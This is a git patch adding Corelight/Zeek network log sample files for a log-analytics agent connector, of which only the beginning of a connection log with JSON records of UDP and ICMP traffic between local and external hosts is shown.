From 85179f854f045ee38a2abe41fe82341057b2eb27 Mon Sep 17 00:00:00 2001 From: Alex Verbniak Date: Fri, 12 Mar 2021 11:44:43 +0200 Subject: [PATCH] Corelight: file samples for la_agent --- .../conn_20180803_16:37:13-16:40:00-0800.log_ | 200 ++++++ ...burst_20180803_16:37:28-16:40:00-0700.log_ | 2 + .../dhcp_20180803_16:37:08-16:40:00-0700.log_ | 224 +++++++ .../dnp3_20180803_16:39:01-16:40:00-0700.log_ | 65 ++ .../dns_20180803_16:36:44-16:40:00-0800.log_ | 200 ++++++ .../dpd_20180803_16:36:45-16:40:00-0700.log_ | 38 ++ ...files_20180803_16:37:08-16:40:00-0800.log_ | 200 ++++++ .../ftp_20180803_16:37:54-16:40:00-0700.log_ | 41 ++ .../http_20180803_16:37:08-16:40:00-0800.log_ | 200 ++++++ ...intel_20180803_16:37:37-16:40:00-0700.log_ | 85 +++ ...otice_20180803_16:37:37-16:40:00-0700.log_ | 12 + .../ntlm_20180803_16:39:01-16:40:00-0700.log_ | 11 + .../pe_20180803_16:37:18-16:40:00-0700.log_ | 50 ++ ...files_20180803_16:39:01-16:40:00-0700.log_ | 26 + ...pping_20180803_16:39:01-16:40:00-0700.log_ | 11 + .../smtp_20180803_16:37:37-16:40:00-0700.log_ | 20 + ...tware_20180803_16:37:08-16:40:00-0700.log_ | 590 ++++++++++++++++++ .../ssh_20180803_16:38:12-16:40:00-0700.log_ | 8 + .../ssl_20180803_16:37:08-16:40:00-0800.log_ | 200 ++++++ ...unnel_20180803_16:39:01-16:40:00-0700.log_ | 4 + ...weird_20180803_16:37:08-16:40:00-0800.log_ | 200 ++++++ .../x509_20180803_16:37:08-16:40:00-0800.log_ | 200 ++++++ 22 files changed, 2587 insertions(+) create mode 100644 Sample Data/Custom/Corelight/conn_20180803_16:37:13-16:40:00-0800.log_ create mode 100644 Sample Data/Custom/Corelight/conn_burst_20180803_16:37:28-16:40:00-0700.log_ create mode 100644 Sample Data/Custom/Corelight/dhcp_20180803_16:37:08-16:40:00-0700.log_ create mode 100644 Sample Data/Custom/Corelight/dnp3_20180803_16:39:01-16:40:00-0700.log_ create mode 100644 Sample Data/Custom/Corelight/dns_20180803_16:36:44-16:40:00-0800.log_ create mode 100644 Sample Data/Custom/Corelight/dpd_20180803_16:36:45-16:40:00-0700.log_ create mode 100644 Sample Data/Custom/Corelight/files_20180803_16:37:08-16:40:00-0800.log_ create mode 100644 Sample Data/Custom/Corelight/ftp_20180803_16:37:54-16:40:00-0700.log_ create mode 100644 Sample Data/Custom/Corelight/http_20180803_16:37:08-16:40:00-0800.log_ create mode 100644 Sample Data/Custom/Corelight/intel_20180803_16:37:37-16:40:00-0700.log_ create mode 100644 Sample Data/Custom/Corelight/notice_20180803_16:37:37-16:40:00-0700.log_ create mode 100644 Sample Data/Custom/Corelight/ntlm_20180803_16:39:01-16:40:00-0700.log_ create mode 100644 Sample Data/Custom/Corelight/pe_20180803_16:37:18-16:40:00-0700.log_ create mode 100644 Sample Data/Custom/Corelight/smb_files_20180803_16:39:01-16:40:00-0700.log_ create mode 100644 Sample Data/Custom/Corelight/smb_mapping_20180803_16:39:01-16:40:00-0700.log_ create mode 100644 Sample Data/Custom/Corelight/smtp_20180803_16:37:37-16:40:00-0700.log_ create mode 100644 Sample Data/Custom/Corelight/software_20180803_16:37:08-16:40:00-0700.log_ create mode 100644 Sample Data/Custom/Corelight/ssh_20180803_16:38:12-16:40:00-0700.log_ create mode 100644 Sample Data/Custom/Corelight/ssl_20180803_16:37:08-16:40:00-0800.log_ create mode 100644 Sample Data/Custom/Corelight/tunnel_20180803_16:39:01-16:40:00-0700.log_ create mode 100644 Sample Data/Custom/Corelight/weird_20180803_16:37:08-16:40:00-0800.log_ create mode 100644 Sample Data/Custom/Corelight/x509_20180803_16:37:08-16:40:00-0800.log_ diff --git a/Sample Data/Custom/Corelight/conn_20180803_16:37:13-16:40:00-0800.log_ b/Sample Data/Custom/Corelight/conn_20180803_16:37:13-16:40:00-0800.log_ new file mode 100644 index 0000000000..e696b5e228 --- /dev/null +++ b/Sample Data/Custom/Corelight/conn_20180803_16:37:13-16:40:00-0800.log_ @@ -0,0 +1,200 @@ +{"ts":"2018-08-03T23:38:57.722821Z","uid":"CyQZnk3cjLp2QBW9u6","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"197.254.245.135","id.resp_p":23597,"proto":"udp","duration":0.000186,"orig_bytes":90,"resp_bytes":130,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":5,"orig_ip_bytes":230,"resp_pkts":5,"resp_ip_bytes":270,"tunnel_parents":[],"resp_cc":"SD"} +{"ts":"2018-08-03T23:38:57.779872Z","uid":"CvdRKF3dQsSpop8Jic","id.orig_h":"109.145.237.199","id.orig_p":6927,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":48,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"GB"} +{"ts":"2018-08-03T23:38:58.562133Z","uid":"Cgt7WB14MUxaubpp9c","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"83.82.80.27","id.resp_p":58223,"proto":"udp","duration":0.000088,"orig_bytes":72,"resp_bytes":104,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":4,"orig_ip_bytes":184,"resp_pkts":4,"resp_ip_bytes":216,"tunnel_parents":[],"resp_cc":"NL"} +{"ts":"2018-08-03T23:38:57.702013Z","uid":"COPs7KBsVsd7DNWwc","id.orig_h":"62.8.115.106","id.orig_p":3,"id.resp_h":"192.168.0.53","id.resp_p":13,"proto":"icmp","conn_state":"OTH","local_orig":false,"local_resp":true,"missed_bytes":0,"orig_pkts":1,"orig_ip_bytes":56,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"GB"} +{"ts":"2018-08-03T23:38:51.396375Z","uid":"CKjiAZ2yaWkCrFjAA7","id.orig_h":"93.126.19.11","id.orig_p":3,"id.resp_h":"192.168.0.53","id.resp_p":1,"proto":"icmp","duration":6.498756,"orig_bytes":144,"resp_bytes":0,"conn_state":"OTH","local_orig":false,"local_resp":true,"missed_bytes":0,"orig_pkts":3,"orig_ip_bytes":228,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"IR"} +{"ts":"2018-08-03T23:38:58.494780Z","uid":"CvZr0R1nOpDhn5Xkpg","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"82.245.207.63","id.resp_p":63432,"proto":"udp","duration":0.000054,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"FR"} +{"ts":"2018-08-03T23:38:14.499871Z","uid":"CrZtna4xU4J2iP0bPj","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"111.221.77.142","id.resp_p":443,"proto":"udp","duration":44.130592,"orig_bytes":36,"resp_bytes":52,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":2,"orig_ip_bytes":92,"resp_pkts":2,"resp_ip_bytes":108,"tunnel_parents":[],"resp_cc":"HK"} +{"ts":"2018-08-03T23:38:57.650618Z","uid":"CdhtZt2fI1Z1D5hs93","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"61.89.176.206","id.resp_p":65183,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"JP"} +{"ts":"2018-08-03T23:38:57.970047Z","uid":"CqAZZr1edRq7VImnI1","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"76.11.24.144","id.resp_p":52765,"proto":"udp","duration":0.000198,"orig_bytes":90,"resp_bytes":130,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":5,"orig_ip_bytes":230,"resp_pkts":5,"resp_ip_bytes":270,"tunnel_parents":[],"resp_cc":"CA"} +{"ts":"2018-08-03T23:38:57.650615Z","uid":"CwxLly4xPs49zMjdJ5","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"192.30.154.154","id.resp_p":43033,"proto":"udp","duration":0.000052,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:57.842709Z","uid":"C9zK0V1ehIJGM9RFuh","id.orig_h":"111.221.74.44","id.orig_p":40022,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":126,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"SG"} +{"ts":"2018-08-03T23:38:45.854351Z","uid":"CpGgkV2WWc1i4orhPa","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.56.52.17","id.resp_p":40012,"proto":"udp","duration":12.057749,"orig_bytes":44,"resp_bytes":98,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":2,"orig_ip_bytes":100,"resp_pkts":1,"resp_ip_bytes":126,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:16.164995Z","uid":"CvecpP1P9tLQa8RmA","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.56.52.26","id.resp_p":443,"proto":"udp","duration":42.397143,"orig_bytes":54,"resp_bytes":130,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^dD","orig_pkts":3,"orig_ip_bytes":138,"resp_pkts":5,"resp_ip_bytes":270,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:58.630232Z","uid":"C0aSdHRfV7dfNbTYa","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.56.52.20","id.resp_p":40020,"proto":"udp","duration":0.000034,"orig_bytes":22,"resp_bytes":98,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":50,"resp_pkts":1,"resp_ip_bytes":126,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:57.585404Z","uid":"CEX15n3q8Te9Mlpzqi","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.56.52.24","id.resp_p":40020,"proto":"udp","duration":0.000005,"orig_bytes":22,"resp_bytes":98,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":50,"resp_pkts":1,"resp_ip_bytes":126,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:57.716485Z","uid":"CZb27q2Zwvcj6S2Kp9","id.orig_h":"86.86.22.7","id.orig_p":21429,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":48,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"NL"} +{"ts":"2018-08-03T23:38:57.722829Z","uid":"CfZcgd1jen4aA1p3hl","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"199.127.173.154","id.resp_p":29838,"proto":"udp","duration":0.000043,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"CA"} +{"ts":"2018-08-03T23:38:57.964327Z","uid":"CCZ0lq3Mn2vVng4gxk","id.orig_h":"5.167.156.187","id.orig_p":51825,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":47,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"RU"} +{"ts":"2018-08-03T23:38:57.585449Z","uid":"CCfkng1rbRw8q31YVl","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"176.210.165.202","id.resp_p":1530,"proto":"udp","duration":0.000057,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"RU"} +{"ts":"2018-08-03T23:38:57.585446Z","uid":"Cc2CIS2YYZMmLu1Oni","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"79.107.160.24","id.resp_p":41943,"proto":"udp","duration":0.000209,"orig_bytes":90,"resp_bytes":130,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":5,"orig_ip_bytes":230,"resp_pkts":5,"resp_ip_bytes":270,"tunnel_parents":[],"resp_cc":"GR"} +{"ts":"2018-08-03T23:38:16.990341Z","uid":"CiTSC78XqYltn4ql9","id.orig_h":"64.4.23.162","id.orig_p":40009,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","duration":40.973444,"orig_bytes":51,"resp_bytes":1308,"conn_state":"SF","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"Dd","orig_pkts":3,"orig_ip_bytes":135,"resp_pkts":3,"resp_ip_bytes":1392,"tunnel_parents":[],"orig_cc":"US"} +{"ts":"2018-08-03T23:38:19.659555Z","uid":"CNXFu82K54Xow7kKK6","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.56.52.19","id.resp_p":40022,"proto":"udp","duration":38.83515,"orig_bytes":44,"resp_bytes":196,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":2,"orig_ip_bytes":100,"resp_pkts":2,"resp_ip_bytes":252,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:58.494748Z","uid":"CgkhL73mvSRrTjJULb","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"174.88.142.232","id.resp_p":2585,"proto":"udp","duration":0.000127,"orig_bytes":72,"resp_bytes":52,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":4,"orig_ip_bytes":184,"resp_pkts":2,"resp_ip_bytes":108,"tunnel_parents":[],"resp_cc":"CA"} +{"ts":"2018-08-03T23:38:58.562191Z","uid":"CKmRYw1HFO2mZTcr6","id.orig_h":"184.161.213.223","id.orig_p":29549,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":54,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"CA"} +{"ts":"2018-08-03T23:38:57.836989Z","uid":"C0P9DOy1Bacjktxv1","id.orig_h":"192.168.0.2","id.orig_p":3,"id.resp_h":"74.71.209.130","id.resp_p":10,"proto":"icmp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"orig_pkts":1,"orig_ip_bytes":76,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:57.842673Z","uid":"Cbcx3k4GxAl3w7xXu8","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"75.183.17.226","id.resp_p":2345,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:58.831926Z","uid":"CHMOox6s4f37lrZQf","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"87.225.127.188","id.resp_p":18264,"proto":"udp","duration":0.000267,"orig_bytes":72,"resp_bytes":78,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":4,"orig_ip_bytes":184,"resp_pkts":3,"resp_ip_bytes":162,"tunnel_parents":[],"resp_cc":"RU"} +{"ts":"2018-08-03T23:38:57.650612Z","uid":"CVmpne17TDUBStQtK4","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"79.177.169.206","id.resp_p":39399,"proto":"udp","duration":0.000126,"orig_bytes":36,"resp_bytes":104,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":2,"orig_ip_bytes":92,"resp_pkts":4,"resp_ip_bytes":216,"tunnel_parents":[],"resp_cc":"IL"} +{"ts":"2018-08-03T23:38:57.722870Z","uid":"CtsKZm2uz62UcwjDPb","id.orig_h":"111.221.74.44","id.orig_p":40026,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":126,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"SG"} +{"ts":"2018-08-03T23:38:57.842676Z","uid":"CDYeyt2WHioW9sPbnl","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"177.141.132.145","id.resp_p":25558,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"BR"} +{"ts":"2018-08-03T23:38:58.494755Z","uid":"CCPg4p36TvBk7n58yc","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.55.56.144","id.resp_p":443,"proto":"udp","conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^d","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:58.630268Z","uid":"CATxB74VCDEd83PCvj","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"176.196.195.200","id.resp_p":40628,"proto":"udp","duration":0.00032,"orig_bytes":90,"resp_bytes":130,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":5,"orig_ip_bytes":230,"resp_pkts":5,"resp_ip_bytes":270,"tunnel_parents":[],"resp_cc":"RU"} +{"ts":"2018-08-03T23:38:57.786544Z","uid":"CX1yh82fz0yE3FM2Ke","id.orig_h":"68.4.126.100","id.orig_p":31229,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":54,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"US"} +{"ts":"2018-08-03T23:38:57.836983Z","uid":"C2ESMe4Q3FNb18UpX4","id.orig_h":"74.71.209.130","id.orig_p":30536,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":48,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"US"} +{"ts":"2018-08-03T23:38:57.842669Z","uid":"C9HasXG9VtldKsaqh","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.56.52.17","id.resp_p":40006,"proto":"udp","duration":0.000002,"orig_bytes":22,"resp_bytes":98,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":50,"resp_pkts":1,"resp_ip_bytes":126,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:49.222506Z","uid":"CHxTNR3tAm71n2Ij82","id.orig_h":"155.94.67.21","id.orig_p":3,"id.resp_h":"192.168.0.53","id.resp_p":3,"proto":"icmp","duration":8.671851,"orig_bytes":144,"resp_bytes":0,"conn_state":"OTH","local_orig":false,"local_resp":true,"missed_bytes":0,"orig_pkts":3,"orig_ip_bytes":228,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"US"} +{"ts":"2018-08-03T23:38:57.970000Z","uid":"CtRe6N3iEo7KFGIaZ3","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.56.52.29","id.resp_p":40003,"proto":"udp","duration":0.000037,"orig_bytes":22,"resp_bytes":98,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":50,"resp_pkts":1,"resp_ip_bytes":126,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:58.494777Z","uid":"CwXZyj1i098DVFwRcl","id.orig_h":"189.163.100.5","id.orig_p":17268,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":54,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"MX"} +{"ts":"2018-08-03T23:38:58.562099Z","uid":"COYK4l19Gao6trVDq8","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"111.221.74.46","id.resp_p":40030,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":50,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"SG"} +{"ts":"2018-08-03T23:38:57.716489Z","uid":"CpZoED2Zk84RjWP0j1","id.orig_h":"192.168.0.2","id.orig_p":3,"id.resp_h":"86.86.22.7","id.resp_p":10,"proto":"icmp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"orig_pkts":1,"orig_ip_bytes":76,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"NL"} +{"ts":"2018-08-03T23:38:14.152981Z","uid":"Ccxykz1dgzZZPivv08","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.56.52.47","id.resp_p":443,"proto":"udp","duration":43.63355,"orig_bytes":162,"resp_bytes":130,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":9,"orig_ip_bytes":414,"resp_pkts":5,"resp_ip_bytes":270,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:57.786573Z","uid":"CXUXkB1F7qzr4y8kEj","id.orig_h":"167.62.32.69","id.orig_p":47464,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","duration":0.000082,"orig_bytes":104,"resp_bytes":54,"conn_state":"SF","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"Dd","orig_pkts":4,"orig_ip_bytes":216,"resp_pkts":3,"resp_ip_bytes":138,"tunnel_parents":[],"orig_cc":"UY"} +{"ts":"2018-08-03T23:38:12.609095Z","uid":"CDrobU3Jbe737UL0u6","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"111.221.74.45","id.resp_p":443,"proto":"udp","duration":45.953136,"orig_bytes":54,"resp_bytes":234,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^dD","orig_pkts":3,"orig_ip_bytes":138,"resp_pkts":9,"resp_ip_bytes":486,"tunnel_parents":[],"resp_cc":"SG"} +{"ts":"2018-08-03T23:38:58.562107Z","uid":"CbK3dT24eSZKZL3IG4","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"167.60.79.179","id.resp_p":18375,"proto":"udp","duration":0.000166,"orig_bytes":72,"resp_bytes":78,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":4,"orig_ip_bytes":184,"resp_pkts":3,"resp_ip_bytes":162,"tunnel_parents":[],"resp_cc":"UY"} +{"ts":"2018-08-03T23:38:58.756063Z","uid":"CHaweJ3z0sjh1h0G6k","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"172.219.176.177","id.resp_p":9522,"proto":"udp","duration":0.000074,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"CA"} +{"ts":"2018-08-03T23:38:58.907567Z","uid":"CPvumK1dKzRGEiLA86","id.orig_h":"37.144.44.146","id.orig_p":54789,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","duration":0.000085,"orig_bytes":78,"resp_bytes":36,"conn_state":"SF","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"Dd","orig_pkts":3,"orig_ip_bytes":162,"resp_pkts":2,"resp_ip_bytes":92,"tunnel_parents":[],"orig_cc":"RU"} +{"ts":"2018-08-03T23:38:58.959247Z","uid":"CmOAYn1HbXxfKD4yIc","id.orig_h":"85.245.210.143","id.orig_p":59988,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":48,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"PT"} +{"ts":"2018-08-03T23:38:12.396102Z","uid":"C1dZrj342sq2OhnQC1","id.orig_h":"91.190.218.125","id.orig_p":12350,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","duration":46.595038,"orig_bytes":98,"resp_bytes":527,"conn_state":"SF","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"Dd","orig_pkts":6,"orig_ip_bytes":266,"resp_pkts":10,"resp_ip_bytes":807,"tunnel_parents":[],"orig_cc":"LU"} +{"ts":"2018-08-03T23:38:59.022990Z","uid":"C0tHhI2JVlHTYYnIu","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"88.212.36.210","id.resp_p":16978,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"SK"} +{"ts":"2018-08-03T23:38:59.154630Z","uid":"CbFWWw4728zBX2BQyf","id.orig_h":"174.4.41.47","id.orig_p":7039,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":54,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"CA"} +{"ts":"2018-08-03T23:38:59.179396Z","uid":"C6IPst3mmLangb9Dk7","id.orig_h":"93.155.223.219","id.orig_p":5171,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":54,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"BG"} +{"ts":"2018-08-03T23:38:59.192033Z","uid":"C4CvNebmJPhStw69","id.orig_h":"85.157.147.38","id.orig_p":45638,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":50,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"FI"} +{"ts":"2018-08-03T23:38:57.262259Z","uid":"CRJ00w4iSBRl8EmEB2","id.orig_h":"81.7.76.41","id.orig_p":3,"id.resp_h":"192.168.0.53","id.resp_p":1,"proto":"icmp","duration":1.954327,"orig_bytes":96,"resp_bytes":0,"conn_state":"OTH","local_orig":false,"local_resp":true,"missed_bytes":0,"orig_pkts":2,"orig_ip_bytes":152,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"LT"} +{"ts":"2018-08-03T23:38:59.284074Z","uid":"CXqYIg3xeJd0JJ2SLc","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"190.142.219.85","id.resp_p":40330,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"VE"} +{"ts":"2018-08-03T23:38:59.306718Z","uid":"CM68BIjjdGmvPhb97","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"189.223.171.252","id.resp_p":29964,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"MX"} 